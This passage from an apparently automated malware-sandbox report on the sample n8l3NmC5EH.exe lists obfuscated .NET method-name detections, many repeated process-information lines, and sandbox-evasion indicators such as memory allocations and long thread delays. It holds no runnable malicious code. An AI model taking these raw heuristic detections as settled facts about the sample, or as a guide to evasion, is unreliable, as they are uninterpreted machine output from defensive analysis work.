                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, UL3kywkE1DcMHcp6yo.csHigh entropy of concatenated method names: 'ToString', 'zQJTGmNVgY', 's3gT83pIY2', 'vQbTp2SItl', 'ihrTasgMV9', 'j9qTQ7QM8N', 'HfVTbT3bTR', 'kqPTLeHnNE', 'BUFTAlII5p', 'HaQTuCCbb6'
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, M9eYWDI95I4qYnEqnl.csHigh entropy of concatenated method names: 'f2YXC7CAWF', 'Y1tXJ0ASSd', 'h6NXdybaG3', 'mwXX9rPIJO', 'YOvXRbcxDg', 'XZsXOhDZes', 'KKcXUTjXBX', 'zi9XIW38X3', 'ej2Xh3MiRl', 'e8SXZ6UviL'
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, J3rUP09BcynVHwjb7x.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'BwesBGA1uy', 'iJesvc9aT1', 'P30sz9OTKp', 'KiyXf6hTM7', 'jSgXgHEfrc', 'mLIXs9DvEZ', 'TewXXvtA9G', 'Xj08rGaJ7WZyQK3xVOr'
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, N8EUlbvG3jS7xNCTuj.csHigh entropy of concatenated method names: 'jUUD9oKqYv', 'CuTDRlHPZ2', 'JeiDOIcVsl', 'hhRDURIb4m', 'DsBDt4VrZA', 'aZWDIwewES', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, v1HahZzrDNN7Xf4KYj.csHigh entropy of concatenated method names: 'XR9D6JN0pH', 'Xc5DMmRB8H', 'dIBDNg5ZHw', 'k4SDx0FN15', 'VxdD8nmesc', 'nwRDakXoYP', 'gDODQTeX1X', 'oPpDyYNGO0', 'bZADnrYNOc', 'cS0DrEyfOv'
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, fmgILnc5aLBALle6mb.csHigh entropy of concatenated method names: 'UHNgUCwjKM', 'EiOgIdRA7u', 'JVUgZPN6Ua', 'w5PgEoLM0O', 'GvogSvTftV', 'vPSgT2tbLv', 'xpZxOnN86EMeiCefYc', 'waWweJK9LpK6eZ4oN5', 'rRcggnX618', 'TEEgXDoVGi'
                Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, ggu6BDwa8ZgZHdPNpy.csHigh entropy of concatenated method names: 'lq0mZwyusT', 'vSlmEj6QwK', 'ToString', 'YPsmJJuK0N', 'wLMmdmDKXd', 'VfQm9e7Mue', 'QV9mRlFiiL', 'R53mOQZsSd', 'tkvmU3hx0C', 'wwimIyQeMX'
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, kAgg8l2sijaXejHB40.csHigh entropy of concatenated method names: 'bV3m7KK6vX', 'fnXmvyPC64', 'C6q4fVhlLQ', 'nWx4gPpFLo', 'AjomGForCc', 'mqemik6Qu1', 'rMfm0DYuJ5', 'W6Qm5gr9sS', 'nFom3pddbe', 'fovmkqGBmS'
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, ECwjKMMNiOdRA7uAlg.csHigh entropy of concatenated method names: 'RXhd55vALu', 'dWkd3MxyE5', 'cF6dkrQgKo', 'M6udwsWCZ2', 'wBydlT5PiI', 'jUwd2SwDYo', 'fZJdPPKT3x', 'UZBd777emi', 'BrLdB1h7CK', 'AySdvmxnV9'
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, HnEYjDPnWSeiubcCxY.csHigh entropy of concatenated method names: 'bt2tSa7LGP', 'wOPtm0fHe7', 'yJ9ttU6CAq', 'FobtY3r9v6', 'lj0tKeye7D', 'guxtyUBYtR', 'Dispose', 'U9K4JxxQ9t', 'fk54dxsqAH', 'esA49ORbAE'
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, W8StgQNVUPN6UaF5Po.csHigh entropy of concatenated method names: 'wq99HvRhWt', 'YAR96oGWOu', 'jOD9MZiOwo', 'Waf9NxIlTv', 'GSk9SB5MlR', 'RtM9T6wyqx', 'Rh99mn6YkU', 'KcS94hNpyc', 'v889t3YG88', 'WCV9D4qFMM'
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, atVKPSx2tbLvbWqRD8.csHigh entropy of concatenated method names: 'brJOCrstiS', 'HowOdAO2Cm', 'Yt0ORTUhjR', 'orIOU4AxQH', 'In8OIeOAi3', 'UbjRlXWd2q', 'L3OR2bZLOH', 'KW7RPplAgT', 'IwBR7K8jKx', 'CVBRBuHINt'
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, W571SEgfpXscu85C0rV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'E1TDG1AqEG', 'Y1kDi12uRV', 'QI1D0eKWc8', 'ch4D5FHxxk', 'UPPD3Ws39m', 'OFRDkqql5W', 'HxADwmUh6f'
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, liVkvfggQSD8XmxErJo.csHigh entropy of concatenated method names: 'ORPDvls96B', 'IN0DzIr6IP', 'guJYf0Mb6g', 'RffYg720mr', 'JbqYskTUjK', 'OMyYXsgjdD', 'yTuYc48esA', 'ecKYC8YU4v', 'hECYJ3XjcD', 'LtKYdh0DDD'
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, qA4Mfq5f2bJoMiWHK5.csHigh entropy of concatenated method names: 'c3pSW29dld', 'j27SiZnALl', 'fFwS55sjRV', 'NflS3PJSIL', 'OdIS8QB1jX', 'bv2SpqBeeS', 'VEMSaohZfe', 'wEHSQfJJwm', 'lAASbQYs8X', 'UBjSLNg6O3'
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, ERft7DgcBL5iFFQDmx5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gVoetSQ0rd', 'w9NeDm88D6', 'CTeeYD8NZ4', 'GQ9eeJCqyD', 'PQteKaZCSM', 'fXUeFn2C3Y', 's26eyJ3Vgw'
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, eVanR68tnSKQK66uPD.csHigh entropy of concatenated method names: 'q1t5RWlrK58jD3O8Dcq', 'S4GvYVlCay6HKuCX6BS', 'LclO4EmH2v', 'BLUOtOHF2n', 'jKdODXispV', 'Y7tu8vlce1CXjftGFbF', 'JPqEPDlWx4gCaASIjb1', 'KIZgYhlkp8Au87yhUb3'
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, aSjEPsLbuW3jf20UBT.csHigh entropy of concatenated method names: 'c0yUJsOCFi', 'voBU9CyGRx', 'gN8UOHVmV5', 'rrLOvRTYjJ', 'ELtOz0rKgq', 'cByUfpgAUN', 'CNCUg0MA7k', 'M2PUsuAcFk', 'VdpUX5RtIN', 'paFUcdsuN6'
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, jsBSrpdl90mkPRHphX.csHigh entropy of concatenated method names: 'Dispose', 'oeigBubcCx', 'n00s8Fp8C9', 'sXxs8GvxH9', 'tKZgvc4bAC', 'fpsgzuYBvO', 'ProcessDialogKey', 'cV8sf7pQ8C', 'AdLsgVw6QA', 'EL1ssW8EUl'
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, fYlf55uO9qRUHNRX8e.csHigh entropy of concatenated method names: 'SKFUn9ZuEK', 'IS2Urea5iQ', 'IreUqQ0XQw', 'aSbUHxKEUm', 'BO7Uo2gFWh', 'qxTU66mduf', 'ECyU11B1wT', 'qFFUMZPqPc', 'yJkUNdPIQl', 'y69UV6NrHL'
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, H7pQ8CBHdLVw6QANL1.csHigh entropy of concatenated method names: 'wWxtxxQcKq', 'Dp4t8VpZgh', 'OqQtpvFxvb', 'od7tar8Qv7', 'YLBtQxdGdN', 'AJDtbCijDr', 'xKWtLot9Mo', 'TnTtAKLQZd', 'ktEtufV5Rc', 'vFZtWcD98a'
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, LM0OeQV9x9n8HxvovT.csHigh entropy of concatenated method names: 'b3gRobTMr8', 'e7eR13FAug', 'R7b9pHsb1B', 'CD29aFyrYc', 'iZe9QILBQV', 'QcN9bcCAJA', 'UGM9LLyrpS', 'CKg9AqOhUI', 'ISy9uHKRZF', 'thN9WqyWLY'
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, BaxJhW0F4KUltsVN4x.csHigh entropy of concatenated method names: 'qkyjMaucwk', 'd77jNCa5Fc', 'puZjxIVDXo', 'tYyj8OKqii', 'kNZjafdrRE', 'uEUjQlPGt9', 'F0djLFTGyd', 'gu5jAAposY', 'bXLjWVwwd1', 'CVvjGOOJgT'
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, FZkNlusRgZCphNaaw4.csHigh entropy of concatenated method names: 'JG3qiTvfo', 'aqhHvnfAE', 'xD36JBIPK', 'd9s1qZEbS', 'Gn6NS7Nse', 'c7bVC4vLE', 'FYr45SGcdiZhlPruB3', 'dvos04orDNIn5kAEds', 'Xoh4SpvDg', 'PK5D17psV'
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, UL3kywkE1DcMHcp6yo.csHigh entropy of concatenated method names: 'ToString', 'zQJTGmNVgY', 's3gT83pIY2', 'vQbTp2SItl', 'ihrTasgMV9', 'j9qTQ7QM8N', 'HfVTbT3bTR', 'kqPTLeHnNE', 'BUFTAlII5p', 'HaQTuCCbb6'
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, M9eYWDI95I4qYnEqnl.csHigh entropy of concatenated method names: 'f2YXC7CAWF', 'Y1tXJ0ASSd', 'h6NXdybaG3', 'mwXX9rPIJO', 'YOvXRbcxDg', 'XZsXOhDZes', 'KKcXUTjXBX', 'zi9XIW38X3', 'ej2Xh3MiRl', 'e8SXZ6UviL'
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, J3rUP09BcynVHwjb7x.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'BwesBGA1uy', 'iJesvc9aT1', 'P30sz9OTKp', 'KiyXf6hTM7', 'jSgXgHEfrc', 'mLIXs9DvEZ', 'TewXXvtA9G', 'Xj08rGaJ7WZyQK3xVOr'
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, N8EUlbvG3jS7xNCTuj.csHigh entropy of concatenated method names: 'jUUD9oKqYv', 'CuTDRlHPZ2', 'JeiDOIcVsl', 'hhRDURIb4m', 'DsBDt4VrZA', 'aZWDIwewES', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, v1HahZzrDNN7Xf4KYj.csHigh entropy of concatenated method names: 'XR9D6JN0pH', 'Xc5DMmRB8H', 'dIBDNg5ZHw', 'k4SDx0FN15', 'VxdD8nmesc', 'nwRDakXoYP', 'gDODQTeX1X', 'oPpDyYNGO0', 'bZADnrYNOc', 'cS0DrEyfOv'
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, fmgILnc5aLBALle6mb.csHigh entropy of concatenated method names: 'UHNgUCwjKM', 'EiOgIdRA7u', 'JVUgZPN6Ua', 'w5PgEoLM0O', 'GvogSvTftV', 'vPSgT2tbLv', 'xpZxOnN86EMeiCefYc', 'waWweJK9LpK6eZ4oN5', 'rRcggnX618', 'TEEgXDoVGi'
                Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, ggu6BDwa8ZgZHdPNpy.csHigh entropy of concatenated method names: 'lq0mZwyusT', 'vSlmEj6QwK', 'ToString', 'YPsmJJuK0N', 'wLMmdmDKXd', 'VfQm9e7Mue', 'QV9mRlFiiL', 'R53mOQZsSd', 'tkvmU3hx0C', 'wwimIyQeMX'
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: n8l3NmC5EH.exe PID: 7500, type: MEMORYSTR
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeMemory allocated: 1520000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeMemory allocated: 3090000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeMemory allocated: 2FE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeMemory allocated: 93C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeMemory allocated: A3C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeMemory allocated: A5D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeMemory allocated: B5D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeMemory allocated: BC20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeMemory allocated: CC20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeMemory allocated: DC20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeMemory allocated: 1070000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeMemory allocated: 2C60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeMemory allocated: 10F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 599859Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 599747Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 599631Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 599515Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 599372Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 599265Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 599156Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 599047Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 598937Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 598828Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 598718Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 598609Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 598499Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 598390Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 598281Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 598172Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 598062Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 597953Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 597843Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 597734Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 597625Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 597515Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 597406Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 597295Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 597187Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 597078Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 596968Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 596859Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 596750Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 596640Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 596531Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 596422Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 596312Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 596203Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 596093Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 595984Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 595874Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 595765Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 595656Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 595547Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 595437Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 595328Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 595218Jump to behavior
